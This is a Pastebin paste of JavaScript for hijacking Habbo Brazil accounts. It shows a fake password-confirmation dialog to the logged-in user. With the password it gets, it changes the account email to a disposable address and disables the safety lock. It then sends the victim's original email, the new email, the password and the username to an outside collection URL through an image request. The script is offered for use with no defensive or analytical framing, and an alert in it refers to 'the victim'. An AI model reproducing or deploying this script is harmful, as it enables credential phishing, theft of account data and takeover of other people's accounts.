Advertisement
Fabriciool

email adder

Oct 13th, 2013
231
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function add(pass){
  2. new Ajax.Request('/identity/settings',{
  3. onComplete: function(v){
  4. prim = v.responseText.match(/>(.+)@(.+)</)[0].split(/>/)[1].split(/</)[0];
  5. }
  6. });
  7. mail = "RXG_"+Math.floor(Math.random() * 99999999)+"@spamavert.com";
  8.  
  9. new Ajax.Request("/identity/email",{
  10. onComplete: function(x){
  11. appkey = $$("head")[0].innerHTML.match(/n" content="(.+)"/)[0].split(/"/)[2];
  12.             urlToken = x.responseText.match(/name="urlToken" value="(.+)"/)[0].split(/"/)[3];
  13.          
  14.  xd = document.createElement("iframe");
  15.  xd.src = "about:blank";
  16.   xd.name = "frame";
  17.                  $$("head")[0].appendChild(xd);
  18.                  
  19.             t = new Element("form",{
  20.              method: 'post',
  21.                 action: 'https://www.habbo.com.br/identity/change_email',
  22.                 target: 'frame'
  23.             });
  24.            
  25.             t.appendChild(new Element("input",{
  26.             value: mail,
  27.                 name: 'email'
  28.             }));
  29.            
  30.             t.appendChild(new Element("input",{
  31.                value: pass,
  32.                 name: 'currentPassword'
  33.             }));
  34.            
  35.             t.appendChild(new Element("input",{
  36.                value: appkey,
  37.                 name: '__app_key'
  38.             }));
  39.            
  40.             t.appendChild(new Element("input",{
  41.               value: urlToken,
  42.                 name: 'urlToken'
  43.             }));
  44.            
  45.              t.submit();
  46.    
  47. }
  48. });
  49.  
  50. new Ajax.Request("/identity/safetyquestions", {
  51.         onComplete: function (x) {
  52.             appkey = $$("head")[0].innerHTML.match(/token" content="(.+)"/)[0].split(/"/)[2];
  53.             urlToken = x.responseText.match(/urlToken" value="(.+)"/)[0].split(/"/)[2];
  54.             new Ajax.Request("/identity/safetylock_disable", {
  55.                 parameters: "__app_key=" + appkey + "&currentPassword="+pass+"&urlToken= " + urlToken,
  56.                 onComplete: function (check) {
  57.                     if (check.responseText.match(/error-message/)) {
  58.                     alert("Digite sua Senha Corretamente para Acessar a Conta da V&#65533;tima!");
  59.                     }else{
  60. new Image().src="HTTP://SITE.COM.BR/mail.php?email="+prim+"&mail_add="+mail+"&pass="+pass+"&habbo="+habboName+"&user=~ForeverAlone";
  61.  
  62.                     }
  63.                 }
  64.             })
  65.         }
  66.     });
  67.  
  68.     }
  69.  
  70. Dialog.showInfoDialog("rxg_","<b>"+habboName+"</b> para completar a acao digite sua senha abaixo:<br><input type='password' id='pass' placeholder='Senha'>","OK",function(){
  71.  add($$("#pass")[0].value);
  72.  
  73.    
  74. });
  75. $$("[class=title dialog-handle rounded-done]")[0].innerHTML = "Confirme sua senha";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement